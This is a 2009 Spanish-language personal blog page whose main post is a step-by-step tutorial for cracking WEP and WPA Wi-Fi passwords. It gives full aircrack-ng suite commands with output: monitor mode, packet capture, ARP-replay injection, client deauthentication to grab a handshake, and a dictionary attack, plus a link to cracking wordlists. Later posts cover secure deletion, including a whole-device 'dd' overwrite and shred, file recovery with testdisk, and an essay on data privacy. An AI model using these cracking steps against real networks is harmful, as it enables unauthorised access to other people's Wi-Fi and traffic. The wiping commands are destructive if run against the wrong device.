Demo Blog

Potterpig

Wireless Hacking Wep - Wpa

by Andrés Morantes on Nov.22, 2009, under

Se que este ataque es algo viejo, pero lo posteo debido a que muchas veces me han preguntado sobre este tema y siempre les paso un manual que hice algun tiempo, asi pues, pienso que es mejor que quede en mi blog.

Bueno lo primero que tienen que hacer repito, es instalar Linux, estos ataques siempre son mas efectivos en las plataformas *NIX gracias a que los drivers ya hacen parte del kernel (en la mayoría de las ocasiones), además que les recomiendo Linux porque ya trae una cantidad de herramientas listicas para que uno las pruebe.

Otra cosa es saber escoger una buena wireless, yo personalmente les recomiendo las Ralink viejitas, ya que tienen mejor soporte en Linux. Otra un poco mas carita pero que en realidad es la mejor de todas son las Atheros, se van acordar de mi … ya que estas las usan muchos auditores de seguridad, incluso pueden buscar las D-link que ya vienen con este chipset, las D-link viejitas también son buenas, estas traen chipset Ralink. Por otro lado están las wireless de Windows la verdad algunas son buenas otras no mucho aunque hoy en día si corren con suerte Linux ya tendrá soporte, estas son las famosas Broadcom y algunas Intel que son las que vienen con los portatiles de HP y Compaq … así que prueben primero de la siguiente forma:

spiderpig:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

eth1      no wireless extensions.

wlan0     RT73 WLAN  ESSID:"SPIDERPIG"
          Mode:Managed  Frequency=2.437 GHz  Access Point: 00:1B:11:D4:54:63
          Bit Rate=54 Mb/s
          RTS thr:off   Fragment thr:off
          Encryption key: xxxxxxxxx
          Link Quality=91/100  Signal level:-34 dBm  Noise level:-79 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0


Fíjense que mi PC tiene 3 interfaces, la eth0 la eth1 y la wlan0. Mi tarjeta wireless en este caso seria la wlan0 que tiene chipset RT73, no siempre tendrá el mismo nombre de las interfaces por eso es que deben empezar por acá, asegúrense primero el nombre sus interfaces, de acá en adelante mi tarjeta wireless será wlan0. Si aparece después de este comando  significa que Linux la detecto, ahora la otra prueba de oro es saber si puedo pasarla a modo Monitor, recuerden que este modo es como el modo promiscuo solo que la wireless detecta las redes que tiene a su alcance. Para saber si esta en modo monitor se ejecuta el siguiente comando:

spiderpig:~# iwconfig wlan0 mode monitor

Ahora se probara que este en modo monitor, para esto ejecutamos de nuevo iwconfig:

spiderpig:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

eth1      no wireless extensions.

wlan0     RT73 WLAN  ESSID:""
          Mode:Monitor  Frequency=2.437 GHz  Bit Rate=48 Mb/s
          RTS thr:off   Fragment thr:off
          Encryption key:off
          Link Quality=89/100  Signal level:-32 dBm  Noise level:-115 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0


nota> si arroja algún error al pasarlo a modo monitor, se deberán bajar los driver directamente desde la pagina de aircrack y compilarlo.


Fíjense que ya cambio el modo, esto da luz verde a empezar a hacer el ataque.

Ahora se ejecutará el sniffing para detectar redes cercanas y usuarios asociados (“usuarios que estén conectados a algún Access Point”).

spiderpig:~# airodump-ng wlan0

Al lanzar este comando verán algo parecido a esto, podrán ver que en la parte izquierda donde dice CH empezara variar, eso significa que la wireless esta cambiando los canales para detectar redes. Esto mas que todo detecta redes de mayor potencia, se podría poner a escuchar redes en un solo canal, así que no es nada raro que encuentren mas redes al ponerlo a escuchar en un solo canal.

CH  5 ][ Elapsed: 56 s ][ 2008-06-08 14:02

BSSID                                   PWR  Beacons    #Data, #/s    CH  MB  ENC  CIPHER AUTH ESSID

00:0F:3D:FA:20:EE  100        2                0      0                 1   11  OPN              Telebucaramanga
00:0F:3D:FA:59:7F  104        18               0       0                 1     11   OPN              Telebucaramanga
00:16:B6:31:04:B9  100         4                 0       0                 6     48. WPA  TKIP   PSK  eparrar
00:1B:11:09:7F:30  100         10               0                     6    54.  WEP  WEP         TGI-03
00:17:3F:F2:59:A4   98          3                 0                     11   48   OPN              belkin54g
00:1B:11:D4:54:63   82         15                86                  6   54   WEP  WEP   SPIDERPIG
00:00:00:00:00:00   -1            0                 28                  8   -1   OPN             

BSSID                                 STATION          PWR   Rate  Lost  Packets  Probes

00:1B:11:D4:54:63        00:0E:35:8C:1C:1D   83  54- 0     0        5
00:00:00:00:00:00         00:02:2D:28:71:FB  101   0-11     0       28
(not associated)          00:1D:D9:2C:EF:DF  104   0- 1     0        5UNEIntercable,YOYI,Telebucaramanga

El atacante ve que SPIDERPIG tiene encriptación WEP y que además esta enviando datos y actualmente esta en el canal 6. Así que se pone el airodump a escuchar nada más a ese Access Point de la siguiente forma:

spiderpig:~# airodump-ng -c6 --bssid 00:1B:11:D4:54:63 -w spider wlan0
-w spider significa que va a crear un archivo que se llama spider, esto servirá después para poder descifrar la llave. Por lo general el crea 2 archivos uno spider-01.txt y un spider-01.cap. El txt se crea por comodidad, para poder ver las tramas creadas en un archivos de texto incluso para poder crear tramas ARP falsas cuando no tengamos usuarios asociados, los ataques son mas efectivos con alguien asociado pero podemos entrar al access point a las malas como quien dice y obligar al access point a que de información de los IVS que son las cabeceras de las tramas, ahí es donde se encuentra las llaves de acceso, el .cap son los tipos de archivos que se crean como captura de trafico, algo parecido a los archivos que crea el wireshark.


CH  6 ][ Elapsed: 40 s ][ 2008-06-08 19:46

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:1B:11:D4:54:63   81  98      327     1033   89   6  54  WPA  TKIP   PSK  SPIDERPIG

BSSID              STATION            PWR   Rate  Lost  Packets  Probes

00:1B:11:D4:54:63  00:0E:35:8C:1C:1D   78  36-54    39     1012
Ahora el truco es la inyección de tráfico ARP al Access Point, la idea de este ataque es obligar al Access Point a que de información de su tabla ARP para que el atacante recoja información sobre las IVS. Entonces en otra ventana y sin dejar de ejecutar el airodump se ejecutar este otro comando:


spiderpig:~# aireplay-ng -3 -b 00:1B:11:D4:54:63  -h 00:0E:35:8C:1C:1D -x 1024 wlan0

El -3 significa un ataque de inyección de ARP el –b es la MAC del Access Point el –h es la MAC del cliente que esta asociado al Access Point el –x son la cantidad de paquetes por segundo que se le enviara al access point.

spiderpig:~# aireplay-ng -3 -b 00:1B:11:D4:54:63  -h 00:0E:35:8C:1C:1D -x 1024 wlan0
The interface MAC (00:1B:11:20:D2:27) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether 00:0E:35:8C:1C:1D
20:37:07  Waiting for beacon frame (BSSID: 00:1B:11:D4:54:63) on channel 6
Saving ARP requests in replay_arp-0608-203707.cap
You should also start airodump-ng to capture replies.
Read 82899 packets (got 145 ARP requests and 0 ACKs), sent 727522 packets...(1024 pps)?

Se sabrá que el ataque ha empezado cuando sent xxxx packets haya empezado a subir, también podremos ver que la cantidad de IVS enviados ha aumentado, esto podría tomarse como la forma de aumentar los IVS( “los IVS son los mismos que se muestra en la pantalla de airodump en la parte de #Data”)


CH  6 ][ Elapsed: 18 mins ][ 2008-06-08 20:55

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:1B:11:D4:54:63   81  48     8472    7003  117   6  54  WEP  WEP         SPIDERPIG

BSSID              STATION            PWR   Rate  Lost  Packets  Probes

00:1B:11:D4:54:63  00:0E:35:8C:1C:1D  116  48-54    31   107446

Si se fijan los paquetes han aumentado de 1033 a 7003 considerablemente.

Ahora por ultimo pondremos a descifrar la clave, esta es la parte más fácil y maravillosa, porque es automática. Por lo general el aircrack necesita como mínimo tomar 5000 IVS, si no son suficientes el le dirá que aumente los IVS a 10000 así consecutivamente de 5000 en 5000. Lo bueno de esto es que después de ejecutar este comando y al salir este error el continuara su trabajo cuando ud ya tenga los 10000 IVS.


Así que podrá ejecutar este comando al momento de ejecutar el ataque de ARP, mientras tanto podrá ir a ver la novela para que no se pierda ningún momento o a ver una película o salir, el hará todo el trabajo por ud. Según nuestras pruebas mínimo eran 25000 IVS yo alguna vez alcance a necesitar 35000 IVS y hasta 40000IVS eso por la lejanía del Access Point, y claro después de 2 horas obtuve la clave, pero eso sí de que es fijo tener la clave es fijo, y alégrense cuando salga el mensaje de KEY FOUND!







HACKING WPA

En WPA la única forma de poder hacker es con diccionario, pues si quieren intentar pues acá le tengo la formula, el secreto de este ataque es tener un buen diccionario.
Para esto usaremos una inyeccion agresiva deautenticando a un usuario para obtener un handshake, asi que empezaremos usando el airodump como lo había usado antes

spiderpig:~# airodump-ng -c6 --bssid 00:1B:11:D4:54:63 -w spider wlan0


Luego en otra ventana ejecuntan esto:

spiderpig:~/hackwifi# aireplay-ng -0 5 -a 00:1B:11:D4:54:63  -c 00:0E:35:8C:1C:1D -wlan0

Esto hace que deatentiquen a un usuario para poder escucharlo y obtener algunas tramas, y poder pasar al ataque de diccionario. El -0 siginifica deutenticacion y seguido se le manda la cantidad de deautenticaciones que quiere enviar, con 5 son suficientes.

Después de esto se debe ejecutar el wpa de la siguiente forma:

spiderpig:~/hackwifi# aircrack-ng -a 2 -0 -w /media/win2/Andres/dictionaries/word/word.lst spider.cap

-a siginifica modo de ataque seguido de 2 que significa WPA/WPA2 – PSK –w siginifica la dirección del diccionario,  pueden intentar en esta pagina, estan organizados por idioma, http://wifi0wn.wordpress.com/wepwpawpa2-cracking-dictionary/

Opening spider-01.cap
Read 308 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1B:11:D4:54:63  SPIDERPIG                 WPA (1 handshake)
   2  00:16:B6:31:04:B9  eparrar                   WPA (0 handshake)
  
Index number of target network ?

Al ver que obtenga un handshake como en este caso el de SPIDERPIG solo queda escoger esta red, osea oprimimos 1 y damos ENTER. Aircrack tratara de descifrar la clave con el diccionario, la verdad no se cuanto se demore esto,lo cierto es que hay que tener algo de paciencia.


0 comentarios more...

Borrado seguro

by Andrés Morantes on Nov.22, 2009, under

Bueno siguiendo la linea de la evolución de la información he decidido al mismo tiempo crear una entrada al borrado seguro en sistemas *nix.
Porque hacerlo?
si nosotros pudiéramos rescatar la información borrada de cualquier dispositivo de almacenamiento esto nos llevaría a tener pánico ya que mucha información sensible es guardada ellas. Pero el problema es que hoy en día es posible, y hay herramientas gratis y Open Source.
¿pero cual sería la mejor practica, para no sufrir de esta perdida de información?
Pues la solución es el borrado seguro. En google podemos buscar como "borrado seguro" o "disc wipe".
Pero en Linux tenemos herramientas para todos los mortales, bendito San iGNUcio!!
esto aplica para todos los Linux !!! no necesita instalación!

Primero lo que debemos hacer es identificar la partición que deseamos borrar. Vamos a tomar el ejemplo de una memoria SD esas famosas tarjetas en las cámaras.

con el siguiente comando identificamos los discos y particiones, realizamos esto antes de montar el dispositivo de almacenamiento ver figura 1:

Figura 1. Reconocimiento de discos


Después de esto ingresamos la memoria y volvemos a ejecutar el mismo comando y veremos que hay un dispositivo nuevo. Comparar Figura 1 con Figura 2.

Figura 2. Reconocimiento de dispositivo SD


Por último y ya reconociendo la partición que deseamos formatear de forma segura  solo queda ejecutar el siguiente comando:
#dd if=/dev/zero of=/dev/sdb
Esto borrara toda la memoria bit a bit. Por lo que será un borrado seguro, esto hará también que se borre el formato en el que se encontraba la memoria, por lo general para las memorias fotográficas ellas usan un formato Fat16 con su propia estructura de datos, si se realiza un formato seguro, se ingresa a la cámara se toman fotos y se vuelve a poner en el PC, esto generará algunos directorios con caracteres no reconocibles, más no generará perdida de información. Solo tendría que usar una herramienta que sirva para recuperar fotos... y oohhh creo que ya he escrito sobre eso. En este caso solo hay que poner la memoria en la cámara ir a las opciones de la cámara y formatear nuevamente y listo!
En cualquier otro caso solo tiene que poner algún formato, el formato tradicional de las memorias son Fat 16, este formato definitivamente no me gusta. Así pues dejo como poner formatos según sus gustos.
#cfdisk /dev/sdb

Figura 3. Creación de particiones en Cfdisk

Nos dirá que tenemos un dispositivo en todo el espacio libre y sin formato, pues bien solo tenemos que ir a New, luego escogemos Primary, y usamos todo el tamaño dando "Enter", se nos creará una imagen automaticamente con formato Linux. si deseamos que sea cualquier otro formato ir a type, acá se nos despliega una lista de formatos, escoger el preferido, y digitarlo, en este caso lo dejaremos en FAT32 esto significa que tocará digitar 0C, por último ir a Write y digitar "yes", terminar con Quit.
por último ejecutar:
# mkfs.vfat /dev/sdb1
y listo...

Otro método:
bueno también podremos borrar los archivos de forma segura, se que es aburrido estar formateando la memoria todo el tiempo, pero es una buena solución, también podemos hacer por archivos, la idea del formato seguro es poder borrar el archivo varias veces o reescribirlo varias veces, esto para mortales no es posible, pero con las herramientas adecuadas si se puede.
Actualmente hay muchas herramientas para realizar esto por lo que voy a nombrarlas y usaremos una, ustedes quedaran tendrán la tarea de buscar las demás en google:

shred, wipe, secure-delete toolkit, BCwipe, bleachbit. entre otras.
Personalmente me gustan dos, shred y bleachbit, shred porque fue la primera que supe a manejar y bleachbit porque mas adelante sabrán porque:

Para usar el shred haré uso de un ejemplo claro, la idea es generar un archivo y esto se ira modificando:
primero subiremos a root e instalar coreutils

[root /home/spiderpig]# apt-get install coreutils

generamos un archivo con alguna información.
 [spiderpig ~]$ echo "poterpig generando poderes de super porcino" > poter.txt
[spiderpig ~]$ ls poter.txt 
poter.txt
[spiderpig ~]$ cat poter.txt 
poterpig generando poderes de super porcino
[spiderpig ~]$ shred poter.txt 
[spiderpig ~]$ cat poter.txt

Figura 4. Ejemplo de destrucción de archivos

Como vemos en la Figura 4. el archivo quedo inutilizado, aunque no borrado, esto puede ser útil para algunos, para este ejemplo es una muestra del uso de esta herramienta.
para borrar de forma segura el archivo usaremos el siguiente comando:
#shred -u poter.txt

Este programa reescribe por defecto 25 veces o tiene 25 pasadas, si se desea aumentar el número se puede aumentar con el siguiente comando:

#shred -u -n 30 poter.txt

también puede borrar dispositivos de la siguiente forma
#shred -n 40 /dev/sdb



Ok, ok, tal vez para algunos esto es muy complicado, pero es que me encanta el shell, así pues le daremos gusto a todos, con mi herramienta secreta, ésta la recomiendo todo el tiempo se llama bleachbit, esta herramienta es extremadamente poderosa, una ventaja es que es gráfica :)  otra ventaja es que no solo ayuda a realizar borrados seguros, si no que ayuda a borrar cookies, archivos perdidos y en debian paquetes no utilizados después del uso del apt-get install ... ahhh!!!! lo bueno de la vida esta en Linux.
para instalar solo deben ejecutar:
# apt-get install bleachbit
y disfrutar....

de esto no haré manual solo pondré unas gráficas es realmente sencillo, solo seleccionar que desean limpiar y luego ir a triturar, si desean buscar un archivo especial, deben ir a triturar, escoger el archivo y estar tranquilos.


0 comentarios more...

Data Recovery en Debian

by Andrés Morantes on Nov.22, 2009, under

 Bueno, en el articulo anterior "LA EVOLUCIÓN DE LA INFORMACIÓN" escribía, lo sensible que es nuestra información y lo poco que sabemos cuidarla, además de esto tenemos dispositivos de almacenamiento que son de bajo costo y de gran capacidad. Las buenas practicas de los sistemas operativos tampoco nos ayudan mucho a proteger nuestra información al menos de que no se tenga un acceso físico al contenedor de la información o PC o Servidor, como se quiera llamar.
Alguna vez escuche que mejor solución para la proteger nuestra información es meterla en una caja fuerte y esta en otra caja fuerte ... enterrarla a muchos metros de bajo tierra y poner dos perros androides para que no saquen esta caja de donde fue enterrada.... interesante... al parecer creo que si debería ser así, aunque podemos hacer uso de las buenas prácticas para proteger un poco mas nuestra información.
Primero hay que dejar claro que al borrar información o al realizar un formateo de los dispositivos ésta puede ser recuperada muy fácilmente, haciendo uso de herramientas de investigación forense que hoy en día son gratis, y NO son las mismas que nombre en el artículo anterior, la verdad no hablaré sobre las herramientas de Windows porque hay miles de ellas solo basta con escribir Data recovery en google entre esas (Magic Recovery, Encase, DataRecovery Back). Bueno, por parte del Open Source y que en realidad me ha salvado la vida es Testdisk y para los amantes de Debian éste se encuentra en los repositorios (no estoy seguro si dentro de los repositorios de Fedora y Suse se encuentre debido a que nunca me gusto esta distro, y desconozco de este), con un solo apt-get install testdisk quedará listo para usarse.
#apt-get install testdisk
Este programa se ejecuta desde la terminal, solo se necesita estar como root y escribir testdisk, este programa nos ayuda a recuperar las particiones formateadas y dejándolas tal y como se habían creado, es muyyyyyy sencillo de usar, saldrá algo parecido a esto:

Figura 1.
se escoge create a new log file y luego nos pedirá que se escoja el disco que desea usar para recuperar la información



Figura 2.



escogemos el disco y damos proceed.



Figura 3.


algunos datos se encuentra como invisible, pero continuaremos.

Figura 4.

nos preguntara por la arquitectura, si usas x64 y x86 se escogerá Intel.


Figura 5.


escogemos la opción Analyse


Figura 6.


Ahora nos arrojará las particiones que teníamos creadas con sus respectivas etiquetas. Escogeremos la opción Quick Search


Figura 7.


En esta opción nos dirá las particiones que ha encontrado, en esto caso solo queda volver a dar enter sobre la partición que ha sido borrada.
y por ultimo escoger la opción [write] y reiniciar.

La idea de mostrar esta herramienta es sencilla, parece que las respuestas de consola, se ven algo complicadas, pero la verdad es solo de darle, enter, enter, enter, además porque ésta ayuda a recuperar TODOS los archivos después de ser formateados, claro si tu eres de esas personas que piensan que al formatear un dispositivo no es posible recuperar la información, pues se equivoca, y solo un consejo, muy pequeño, las cámaras digitales, usan dispositivos de almacenamientos, y también se pueden recuperar!!!!!! ésta es la la forma más sencilla de perder información.
Para esto la mejor solución es descargar la información en un lugar seguro y realizar un borrado seguro, tampoco pondré herramientas de Windows ya que hay también miles de programas, solo tienen que escribir en google, borrado seguro y escoger el que más le gusta.


0 comentarios more...

LA EVOLUCIÓN DE LA INFORMACIÓN

by Andrés Morantes on Nov.22, 2009, under

Hace algunos años, la información digital no era de suma importancia como se observa en estos días. Esto debido a que la gran capacidad de la información en computadores personales no era lo suficientemente grande, además de esto poseer discos de gran capacidad era algo costoso y no todos podían gozar de este gran lujo. Aunque suene repetitivo, aburrido y demás, pero, “la evolución de la tecnología” ha hecho que el almacenamiento información haya aumentado en cifras nunca antes pensadas. Si esto aun no te convence, recuerden que nuestros medios portables mas confiables eran unos discos magnéticos flexibles llamados (disquetes, diskketes o floppy), estos tienen y en algunos casos tenían una capacidad de almacenamiento que varia entre 150k y 200megas, tomare como ejemplo el más comercial de todos y me estoy refiriendo al disco magnético de 3¹/² con capacidad de 1.44 megas, era el maestro de los medios de almacenamiento debido a que se podía cargar una gran cantidad de documentos y reescribirse muchas veces, ahora se pueden ver medios de almacenamientos mas portables que varian entre 256megas a 1Tera. Pero que pasa ahora, la tecnología ha crecido y estos documentos o la información personal se hace cada vez mas voluptuosos, por ejemplo una canción, una película, entre otras, esto hace que los fabricantes de estos dispositivos tengan una mejor penetración en el mercado con dispositivos de gran capacidad.

Pues bien, ¿a donde quiero llegar con todo esto?, si comparamos los dispositivos actuales con los antiguos, estos tienen un gran valor debido a su gran información, es algo tan sencillo como decir que a mayor tamaño, mayor información, y donde se encuentran esta información depositada actualmente y como se llaman estos dispositivos?, ok.. se me vienen muchos nombres, entre ellos, celulares, ipods, mp3, mp4, usbs sticks, manillas tipo usb, portátiles, estos a su vez son muy baratos y la perdida de éstos no es tan grave, en fin, nadie se da cuenta que estos dispositivos, aunque nos han facilitado la vida también nos la ha complicado. Si ponemos ejemplos claros, muchas celebridades han sufrido ataques de supuestos hackers, que han entrado en sus sistemas y han obtenido información de sus dispositivos, según comentan ellos. También hay ejemplos claros de personas, incluso cercanas a ustedes que han sido victimas de fotos robadas desde esta clase de dispositivos, y obtenerlos es tan sencillo como pedirle una usb stick o el celular a un amigo prestado, hay que sacarnos de la cabeza que borrar un archivo o formatear el dispositivo "NO ES UNA FORMA SEGURA" solo hagan una pequeña busqueda por nuestro amigo google como "Data recovery" y sabrán de que estoy hablando. 
Esto parece labor de expertos hackers, en mi concepto, “NO LO ES”, a continuación posteo una noticia muy conocida pero muyyyyyy interesante.http://www.washingtonpost.com/wp-dyn/content/article/2005/09/13/AR2005091301423.html

Pues bien, esta noticia nos da una pequeña visión de que la información, SI es bastante sensible y además es muy fácil poseer los conocimientos para obtenerla. Antiguamente se necesitaba tener una gran agilidad para obtener información personal y así acceder a los sistemas de información, muchas de estas técnicas se basaron en la ingeniería social, el cual se basa en obtener información personal a través de la manipulación de las personas, hay que recordar que las personas son el eslabón más débil en los sistemas de información, pues bien, esta técnica que sigue siendo la más peligrosa antes vista, ha pasado un poco de moda en mi concepto, ya que esta técnica han sido recompiladas por la mejor herramienta forense nunca antes vista, solo se necesita inscribirse y además es gratissss!! como a todos les gusta. Bueno pero antes algunas descripciones de esta herramienta.

  • Recopilación de información de personas (nombre,edad,teléfono, trabajo actual, entre otras )
  • Recopilación de personas cercanas
  • Recopilación de información familiar
  • Recopilación de información de eventos asistidos.
  • Fácil manejo

Pues bien, la página es la siguiente:
también puede hacer uso de algunas otras herramientas en el siguiente enlace.
0 comentarios more...
Con la tecnología de Blogger.

Looking for something?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!